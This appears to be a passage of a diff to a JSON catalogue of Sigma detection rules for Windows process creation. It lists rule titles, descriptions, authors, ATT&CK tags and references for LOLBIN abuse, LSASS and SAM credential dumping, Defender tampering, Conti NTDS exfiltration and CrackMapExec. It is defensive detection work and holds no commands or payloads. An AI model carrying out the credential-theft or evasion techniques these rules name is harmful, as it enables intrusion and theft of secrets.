"author": "Thomas Patzke", + "creation_date": "2020/05/22", "falsepositive": [ "Unknown" ], - "filename": "proc_creation_win_lolbin_susp_mpcmdrun_download.yml", + "filename": "proc_creation_win_susp_crackmapexec_execution.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://web.archive.org/web/20200903194959/https://twitter.com/djmtshepana/status/1301608169496612866", - "https://lolbas-project.github.io/lolbas/Binaries/MpCmdRun/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_susp_mpcmdrun_download.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218", - "attack.command_and_control", - "attack.t1105" - ] - }, - "uuid": "46123129-1024-423e-9fae-43af4a0fa9a5", - "value": "Windows Defender Download Activity" - }, - { - "description": "Detects process dump via legitimate sqldumper.exe binary", - "meta": { - "author": "Kirill Kiryanov, oscd.community", - "creation_date": "2020/10/08", - "falsepositive": [ - "Legitimate MSSQL Server actions" - ], - "filename": "proc_creation_win_lolbin_susp_sqldumper_activity.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/countuponsec/status/910977826853068800", - "https://twitter.com/countuponsec/status/910969424215232518", - "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Sqldumper/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_susp_sqldumper_activity.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003.001" - ] - }, - "uuid": "23ceaf5c-b6f1-4a32-8559-f2ff734be516", - "value": "Dumping Process via Sqldumper.exe" - }, - { - "description": "Detects Possible usage of Windows Subsystem for Linux (WSL) binary as a LOLBIN", - "meta": { - "author": "oscd.community, Zach Stanford @svch0st, Nasreddine Bencherchali", - "creation_date": 
"2020/10/05", - "falsepositive": [ - "Automation and orchestration scripts may use this method execute scripts etc", - "Legitimate use by Windows to kill processes opened via WSL (example VsCode WSL server)" - ], - "filename": "proc_creation_win_lolbin_susp_wsl.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Wsl/", - "https://twitter.com/nas_bench/status/1535431474429808642", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_susp_wsl.yml" + "https://github.com/byt3bl33d3r/CrackMapExec", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_crackmapexec_execution.yml" ], "tags": [ "attack.execution", - "attack.defense_evasion", - "attack.t1218", - "attack.t1202" + "attack.t1047", + "attack.t1053", + "attack.t1059.003", + "attack.t1059.001", + "attack.s0106" ] }, - "uuid": "dec44ca7-61ad-493c-bfd7-8819c5faa09b", - "value": "WSL Execution" + "uuid": "058f4380-962d-40a5-afce-50207d36d7e2", + "value": "CrackMapExec Command Execution" }, { - "description": "Executes arbitrary PowerShell code using SyncAppvPublishingServer.exe.", + "description": "Detects requests to exclude files, folders or processes from Antivirus scanning using PowerShell cmdlets", "meta": { - "author": "frack113", - "creation_date": "2021/07/12", + "author": "Florian Roth", + "creation_date": "2021/04/29", "falsepositive": [ - "App-V clients" + "Possible Admin Activity", + "Other Cmdlets that may use the same parameters" ], - "filename": "proc_creation_win_lolbin_syncappvpublishingserver_execute_psh.yml", + "filename": "proc_creation_win_powershell_defender_exclusion.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - 
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md", - "https://lolbas-project.github.io/lolbas/Binaries/Syncappvpublishingserver/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_syncappvpublishingserver_execute_psh.yml" + "https://twitter.com/AdamTheAnalyst/status/1483497517119590403", + "https://docs.microsoft.com/en-us/microsoft-365/security/defender-endpoint/configure-process-opened-file-exclusions-microsoft-defender-antivirus", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_defender_exclusion.yml" ], "tags": [ "attack.defense_evasion", - "attack.t1218" + "attack.t1562.001" ] }, - "uuid": "fbd7c32d-db2a-4418-b92c-566eb8911133", - "value": "SyncAppvPublishingServer Execute Arbitrary PowerShell Code" + "uuid": "17769c90-230e-488b-a463-e05c08e9d48f", + "value": "Powershell Defender Exclusion" }, { - "description": "Executes arbitrary PowerShell code using SyncAppvPublishingServer.vbs", + "description": "Detects suspicious calls of DLLs in rundll32.dll exports by ordinal", "meta": { - "author": "frack113", - "creation_date": "2021/07/16", + "author": "Florian Roth", + "creation_date": "2019/10/22", "falsepositive": [ - "Unknown" + "False positives depend on scripts and administrative tools used in the monitored environment", + "Windows control panel elements have been identified as source (mmc)" ], - "filename": "proc_creation_win_lolbin_syncappvpublishingserver_vbs_execute_psh.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1216/T1216.md", - 
"https://lolbas-project.github.io/lolbas/Binaries/Syncappvpublishingserver/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_syncappvpublishingserver_vbs_execute_psh.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218", - "attack.t1216" - ] - }, - "uuid": "36475a7d-0f6d-4dce-9b01-6aeb473bbaf1", - "value": "SyncAppvPublishingServer VBS Execute Arbitrary PowerShell Code" - }, - { - "description": "Detects the executiob of TTDInject.exe, which is used by Windows 10 v1809 and newer to debug time travel (underlying call of tttracer.exe)", - "meta": { - "author": "frack113", - "creation_date": "2022/05/16", - "falsepositive": [ - "Legitimate use" - ], - "filename": "proc_creation_win_lolbin_ttdinject.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Ttdinject/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_ttdinject.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1127" - ] - }, - "uuid": "b27077d6-23e6-45d2-81a0-e2b356eea5fd", - "value": "Use of TTDInject.exe" - }, - { - "description": "Detects usage of Time Travel Debugging Utility. 
Adversaries can execute malicious processes and dump processes, such as lsass.exe, via tttracer.exe.", - "meta": { - "author": "Ensar Şamil, @sblmsrsn, @oscd_initiative", - "creation_date": "2020/10/06", - "falsepositive": [ - "Legitimate usage by software developers/testers" - ], - "filename": "proc_creation_win_lolbin_tttracer_mod_load.yml", + "filename": "proc_creation_win_susp_rundll32_by_ordinal.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Tttracer/", - "https://twitter.com/mattifestation/status/1196390321783025666", - "https://twitter.com/oulusoyum/status/1191329746069655553", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_tttracer_mod_load.yml" + "https://techtalk.pcmatic.com/2017/11/30/running-dll-files-malware-analysis/", + "https://github.com/Neo23x0/DLLRunner", + "https://www.welivesecurity.com/2022/03/01/isaacwiper-hermeticwizard-wiper-worm-targeting-ukraine/", + "https://twitter.com/cyb3rops/status/1186631731543236608", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_rundll32_by_ordinal.yml" ], "tags": [ "attack.defense_evasion", - "attack.credential_access", - "attack.t1218", - "attack.t1003.001" + "attack.t1218.011" ] }, - "uuid": "0b4ae027-2a2d-4b93-8c7e-962caaba5b2a", - "value": "Time Travel Debugging Utility Usage" + "uuid": "e79a9e79-eb72-4e78-a628-0e7e8f59e89c", + "value": "Suspicious Call by Ordinal" }, { - "description": "Detects the use of a Microsoft signed script executing a managed DLL with PowerShell.", + "description": "Detects EmpireMonkey APT reported Activity", "meta": { - "author": "frack113", - "creation_date": "2022/05/28", + "author": "Markus Neis", + "creation_date": "2019/04/02", "falsepositive": [ - "Unknown" + "Very Unlikely" ], - "filename": "proc_creation_win_lolbin_utilityfunctions.yml", - "level": 
"medium", + "filename": "proc_creation_win_apt_empiremonkey.yml", + "level": "critical", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://lolbas-project.github.io/lolbas/Scripts/UtilityFunctions/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_utilityfunctions.yml" + "https://app.any.run/tasks/a4107649-8cb0-41af-ad75-113152d4d57b", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_empiremonkey.yml" ], "tags": [ "attack.defense_evasion", - "attack.t1216" + "attack.t1218.010" ] }, - "uuid": "0403d67d-6227-4ea8-8145-4e72db7da120", - "value": "UtilityFunctions.ps1 Proxy Dll" + "uuid": "10152a7b-b566-438f-a33c-390b607d1c8d", + "value": "Empire Monkey" }, { - "description": "VisualUiaVerifyNative.exe is a Windows SDK that can be used for AWL bypass and is listed in Microsoft's recommended block rules.", + "description": "Detects renamed SysInternals tool execution with a binary named ps.exe as used by Dragonfly APT group and documented in TA17-293A report", "meta": { - "author": "Christopher Peacock @SecurePeacock, SCYTHE @scythe_io", - "creation_date": "2022/06/01", + "author": "Florian Roth", + "creation_date": "2017/10/22", "falsepositive": [ - "Legitimate testing of Microsoft UI parts." 
+ "Renamed SysInternals tool" ], - "filename": "proc_creation_win_lolbin_visualuiaverifynative.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://lolbas-project.github.io/lolbas/OtherMSBinaries/VisualUiaVerifyNative/", - "https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules", - "https://bohops.com/2020/10/15/exploring-the-wdac-microsoft-recommended-block-rules-visualuiaverifynative/", - "https://github.com/MicrosoftDocs/windows-itpro-docs/commit/937db704b9148e9cee7c7010cad4d00ce9c4fdad", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_visualuiaverifynative.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218" - ] - }, - "uuid": "b30a8bc5-e21b-4ca2-9420-0a94019ac56a", - "value": "Use of VisualUiaVerifyNative.exe" - }, - { - "description": "Detects successful code compilation via Visual Basic Command Line Compiler that utilizes Windows Resource to Object Converter.", - "meta": { - "author": "Ensar Şamil, @sblmsrsn, @oscd_initiative", - "creation_date": "2020/10/07", - "falsepositive": [ - "Utilization of this tool should not be seen in enterprise environment" - ], - "filename": "proc_creation_win_lolbin_visual_basic_compiler.yml", + "filename": "proc_creation_win_apt_ta17_293a_ps.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Vbc/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_visual_basic_compiler.yml" + "https://www.us-cert.gov/ncas/alerts/TA17-293A", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_ta17_293a_ps.yml" ], "tags": [ "attack.defense_evasion", - "attack.t1027.004" + "attack.g0035", + "attack.t1036.003", + 
"car.2013-05-009" ] }, - "uuid": "7b10f171-7f04-47c7-9fa2-5be43c76e535", - "value": "Visual Basic Command Line Compiler Usage" + "uuid": "18da1007-3f26-470f-875d-f77faf1cab31", + "value": "Ps.exe Renamed SysInternals Tool" }, { - "description": "The \"VSIISExeLauncher.exe\" binary part of the Visual Studio/VS Code can be used to execute arbitrary binaries", + "description": "Detects the execution of a signed binary dropped by Kaspersky Lab Products Remover (kavremover) which can be abused as a LOLBIN to execute arbitrary commands and binaries.", "meta": { "author": "Nasreddine Bencherchali", - "creation_date": "2022/06/09", + "creation_date": "2022/11/01", "falsepositive": [ "Unknown" ], - "filename": "proc_creation_win_lolbin_vsiisexelauncher.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://lolbas-project.github.io/lolbas/OtherMSBinaries/VSIISExeLauncher/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_vsiisexelauncher.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1127" - ] - }, - "uuid": "18749301-f1c5-4efc-a4c3-276ff1f5b6f8", - "value": "Use of VSIISExeLauncher.exe" - }, - { - "description": "The Workflow Command-line Compiler can be used for AWL bypass and is listed in Microsoft's recommended block rules.", - "meta": { - "author": "Christopher Peacock @SecurePeacock, SCYTHE @scythe_io", - "creation_date": "2022/06/01", - "falsepositive": [ - "Legitimate use by a software developer" - ], - "filename": "proc_creation_win_lolbin_wfc.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Wfc/", - "https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules", - 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_wfc.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1127" - ] - }, - "uuid": "49be8799-7b4d-4fda-ad23-cafbefdebbc5", - "value": "Use of Wfc.exe" - }, - { - "description": "Detects Winword process loading custmom dlls via the '/l' switch.\nWinword can be abused as a LOLBIN to download arbitrary file or load arbitrary DLLs.\n", - "meta": { - "author": "Nasreddine Bencherchali, Victor Sergeev, oscd.community", - "creation_date": "2022/05/17", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_lolbin_winword.yml", + "filename": "proc_creation_win_lolbin_kavremover.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Winword/", - "https://github.com/D4Vinci/One-Lin3r/blob/9fdfa5f0b9c698dfbd4cdfe7d2473192777ae1c6/one_lin3r/core/liners/windows/cmd/dll_loader_word.py", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_winword.yml" + "https://nasbench.medium.com/lolbined-using-kaspersky-endpoint-security-kes-installer-to-execute-arbitrary-commands-1c999f1b7fea", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_kavremover.yml" ], "tags": [ + "attack.defense_evasion", + "attack.t1127" + ] + }, + "uuid": "d047726b-c71c-4048-a99b-2e2f50dc107d", + "value": "Kavremover Dropped Binary LOLBIN Usage" + }, + { + "description": "Detects MsiExec loading a DLL and calling its DllUnregisterServer function", + "meta": { + "author": "frack113", + "creation_date": "2022/04/24", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_msiexec_dll.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + 
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.007/T1218.007.md", + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/msiexec", + "https://twitter.com/_st0pp3r_/status/1583914515996897281", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msiexec_dll.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218.007" + ] + }, + "uuid": "84f52741-8834-4a8c-a413-2eb2269aa6c8", + "value": "Suspicious Msiexec Load DLL" + }, + { + "description": "Detects execution of powershell scripts via Runscripthelper.exe", + "meta": { + "author": "Victor Sergeev, oscd.community", + "creation_date": "2020/10/09", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_runscripthelper.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Runscripthelper/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_runscripthelper.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059", "attack.defense_evasion", "attack.t1202" ] }, - "uuid": "4ae3e30b-b03f-43aa-87e3-b622f4048eed", - "value": "Winword LOLBIN Usage" + "uuid": "eca49c87-8a75-4f13-9c73-a5a29e845f03", + "value": "Suspicious Runscripthelper.exe" }, { - "description": "Detects use of Wlrmdr.exe in which the -u parameter is passed to ShellExecute", + "description": "Detects the use of a Microsoft signed script to execute commands", "meta": { - "author": "frack113, manasmbellani", - "creation_date": "2022/02/16", + "author": "oscd.community, Natalia Shornikova, frack113", + "creation_date": "2022/05/21", "falsepositive": [ "Unknown" ], - "filename": "proc_creation_win_lolbin_wlrmdr.yml", + "filename": "proc_creation_win_lolbin_cl_mutexverifiers.yml", "level": "medium", "logsource.category": 
"process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/0gtweet/status/1493963591745220608?s=20&t=xUg9DsZhJy1q9bPTUWgeIQ", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_wlrmdr.yml" + "https://lolbas-project.github.io/lolbas/Scripts/CL_mutexverifiers/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_cl_mutexverifiers.yml" ], "tags": [ + "attack.defense_evasion", + "attack.t1216" + ] + }, + "uuid": "1e0e1a81-e79b-44bc-935b-ddb9c8006b3d", + "value": "CL_Mutexverifiers.ps1 Proxy Execution" + }, + { + "description": "Detects a certain command line flag combination used by devinit.exe lolbin to download arbitrary MSI packages on a Windows system", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/01/11", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_devinit_lolbin.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/mrd0x/status/1460815932402679809", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_devinit_lolbin.yml" + ], + "tags": [ + "attack.execution", "attack.defense_evasion", "attack.t1218" ] }, - "uuid": "9cfc00b6-bfb7-49ce-9781-ef78503154bb", - "value": "Wlrmdr Lolbin Use as Launcher" + "uuid": "90d50722-0483-4065-8e35-57efaadd354d", + "value": "DevInit Lolbin Download" }, { - "description": "Detects Too long PowerShell command lines", + "description": "Adversaries may disable security tools to avoid possible detection of their tools and activities by removing Windows Defender Definition Files", "meta": { - "author": "oscd.community, Natalia Shornikova", - "creation_date": "2020/10/06", + "author": "frack113", + "creation_date": "2021/07/07", "falsepositive": [ "Unknown" ], - "filename": "proc_creation_win_long_powershell_commandline.yml", - 
"level": "low", + "filename": "proc_creation_win_remove_windows_defender_definition_files.yml", + "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_long_powershell_commandline.yml" + "https://unit42.paloaltonetworks.com/unit42-gorgon-group-slithering-nation-state-cybercrime/", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_remove_windows_defender_definition_files.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ] + }, + "uuid": "9719a8aa-401c-41af-8108-ced7ec9cd75c", + "value": "Remove Windows Defender Definition Files" + }, + { + "description": "Detects a explorer.exe sub process of the RazerInstaller software which can be invoked from the installer to select a different installation folder but can also be exploited to escalate privileges to LOCAL SYSTEM", + "meta": { + "author": "Florian Roth, Maxime Thiebaut", + "creation_date": "2021/08/23", + "falsepositive": [ + "User selecting a different installation folder (check for other sub processes of this explorer.exe process)" + ], + "filename": "proc_creation_win_susp_razorinstaller_explorer.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/j0nh4t/status/1429049506021138437", + "https://streamable.com/q2dsji", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_razorinstaller_explorer.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1553" + ] + }, + "uuid": "a4eaf250-7dc1-4842-862a-5e71cd59a167", + "value": "Suspicious RazerInstaller Explorer 
Subprocess" + }, + { + "description": "Detects a base64 encoded IEX command string in a process command line", + "meta": { + "author": "Florian Roth", + "creation_date": "2019/08/23", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_encoded_iex.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_encoded_iex.yml" ], "tags": [ "attack.execution", "attack.t1059.001" ] }, - "uuid": "d0d28567-4b9a-45e2-8bbc-fb1b66a1f7f6", - "value": "Too Long PowerShell Commandlines" + "uuid": "88f680b8-070e-402c-ae11-d2914f2257f1", + "value": "Encoded IEX" }, { - "description": "Detect creation of dump files containing the memory space of lsass.exe, which contains sensitive credentials.\nIdentifies usage of Sysinternals procdump.exe to export the memory space of lsass.exe which contains sensitive credentials.\n", + "description": "Detects usage of the built-in PowerShell cmdlet \"Enable-WindowsOptionalFeature\" used as a Deployment Image Servicing and Management tool.\nSimilar to DISM.exe, this cmdlet is used to enumerate, install, uninstall, configure, and update features and packages in Windows images\n", "meta": { - "author": "E.M. 
Anhaus (originally from Atomic Blue Detections, Tony Lambert), oscd.community", - "creation_date": "2019/10/24", - "falsepositive": [ - "Unlikely" - ], - "filename": "proc_creation_win_lsass_dump.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://eqllib.readthedocs.io/en/latest/analytics/1e1ef6be-12fc-11e9-8d76-4d6bb837cda4.html", - "https://eqllib.readthedocs.io/en/latest/analytics/210b4ea4-12fc-11e9-8d76-4d6bb837cda4.html", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003/T1003.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lsass_dump.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003.001" - ] - }, - "uuid": "ffa6861c-4461-4f59-8a41-578c39f3f23e", - "value": "LSASS Memory Dumping" - }, - { - "description": "Detects usage of the powerShell New-MailboxExportRequest Cmdlet to exports a mailbox to a remote or local share, as used in ProxyShell exploitations", - "meta": { - "author": "Florian Roth", - "creation_date": "2021/08/07", + "author": "Nasreddine Bencherchali", + "creation_date": "2022/12/29", "falsepositive": [ "Unknown" ], - "filename": "proc_creation_win_mailboxexport_share.yml", - "level": "critical", + "filename": "proc_creation_win_windowsoptionalfeature.yml", + "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://youtu.be/5mqid-7zp8k?t=2481", - "https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html", - "https://peterjson.medium.com/reproducing-the-proxyshell-pwn2own-exploit-49743a4ea9a1", - "https://m365internals.com/2022/10/07/hunting-in-on-premises-exchange-server-logs/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mailboxexport_share.yml" + 
"https://learn.microsoft.com/en-us/windows/win32/projfs/enabling-windows-projected-file-system", + "https://docs.microsoft.com/en-us/powershell/module/dism/enable-windowsoptionalfeature?view=windowsserver2022-ps", + "https://learn.microsoft.com/en-us/windows/wsl/install-on-server", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_windowsoptionalfeature.yml" ], "tags": [ - "attack.exfiltration" + "attack.defense_evasion" ] }, - "uuid": "889719ef-dd62-43df-86c3-768fb08dc7c0", - "value": "Suspicious PowerShell Mailbox Export to Share" + "uuid": "c740d4cf-a1e9-41de-bb16-8a46a4f57918", + "value": "Potential Suspicious Windows Feature Enabled - ProcCreation" }, { - "description": "Detects a command used by conti to find volume shadow backups", + "description": "Once established within a system or network, an adversary may use automated techniques for collecting internal data.", "meta": { - "author": "Max Altgelt, Tobias Michalski", - "creation_date": "2021/08/09", + "author": "frack113", + "creation_date": "2021/07/30", "falsepositive": [ "Unknown" ], - "filename": "proc_creation_win_malware_conti.yml", - "level": "high", + "filename": "proc_creation_win_susp_recon.yml", + "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/vxunderground/status/1423336151860002816?s=20", - "https://www.virustotal.com/gui/file/03e9b8c2e86d6db450e5eceec057d7e369ee2389b9daecaf06331a95410aa5f8/detection", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_conti.yml" - ], - "tags": [ - "attack.t1587.001", - "attack.resource_development" - ] - }, - "uuid": "7b30e0a7-c675-4b24-8a46-82fa67e2433d", - "value": "Conti Volume Shadow Listing" - }, - { - "description": "Detects a command used by conti to exfiltrate NTDS", - "meta": { - "author": "Max Altgelt, Tobias Michalski", - "creation_date": "2021/08/09", - "falsepositive": 
[ - "Unknown" - ], - "filename": "proc_creation_win_malware_conti_7zip.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/vxunderground/status/1423336151860002816?s=20", - "https://www.virustotal.com/gui/file/03e9b8c2e86d6db450e5eceec057d7e369ee2389b9daecaf06331a95410aa5f8/detection", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_conti_7zip.yml" + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1119/T1119.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_recon.yml" ], "tags": [ "attack.collection", - "attack.t1560" + "attack.t1119" ] }, - "uuid": "aa92fd02-09f2-48b0-8a93-864813fb8f41", - "value": "Conti NTDS Exfiltration Command" + "uuid": "aa2efee7-34dd-446e-8a37-40790a66efd7", + "value": "Recon Information for Export with Command Prompt" }, { - "description": "Detects a command that accesses password storing registry hives via volume shadow backups", + "description": "This method detects a suspicious PowerShell command line combination as used by APT29 in a campaign against U.S. 
think tanks.", "meta": { - "author": "Max Altgelt, Tobias Michalski", - "creation_date": "2021/08/09", + "author": "Florian Roth", + "creation_date": "2018/12/04", "falsepositive": [ - "Some rare backup scenarios" + "Unknown" ], - "filename": "proc_creation_win_malware_conti_shadowcopy.yml", + "filename": "proc_creation_win_apt_apt29_thinktanks.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/vxunderground/status/1423336151860002816?s=20", - "https://www.virustotal.com/gui/file/03e9b8c2e86d6db450e5eceec057d7e369ee2389b9daecaf06331a95410aa5f8/detection", - "https://pentestlab.blog/2018/07/04/dumping-domain-password-hashes/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_conti_shadowcopy.yml" + "https://www.microsoft.com/security/blog/2018/12/03/analysis-of-cyberattack-on-u-s-think-tanks-non-profits-public-sector-by-unidentified-attackers/", + "https://www.fireeye.com/blog/threat-research/2018/11/not-so-cozy-an-uncomfortable-examination-of-a-suspected-apt29-phishing-campaign.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_apt29_thinktanks.yml" ], "tags": [ - "attack.impact", - "attack.t1490" + "attack.execution", + "attack.g0016", + "attack.t1059.001" ] }, - "uuid": "f57f8d16-1f39-4dcb-a604-6c73d9b54b3d", - "value": "Sensitive Registry Access via Volume Shadow Copy" + "uuid": "033fe7d6-66d1-4240-ac6b-28908009c71f", + "value": "APT29" }, { "description": "Detects typical Dridex process patterns", 
@@ -41840,164 +34255,239 @@ "value": "Dridex Process Pattern" }, { - "description": "Detects specific process parameters as seen in DTRACK infections", + "description": "Adversaries may attempt to extract credential material from the Security Account Manager (SAM) database either through Windows Registry where the SAM database is stored", "meta": { - "author": "Florian Roth", - "creation_date": "2019/10/30", + "author": "frack113", + "creation_date": "2022/01/05", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_reg_dump_sam.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.002/T1003.002.md#atomic-test-1---registry-dump-of-sam-creds-and-secrets", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_dump_sam.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.002" + ] + }, + "uuid": "038cd51c-3ad8-41c5-ba8f-5d1c92f3cc1e", + "value": "Registry Dump of SAM Creds and Secrets" + }, + { + "description": "Detects execution of \"reg.exe\" commands with the \"delete\" flag on services registry key. 
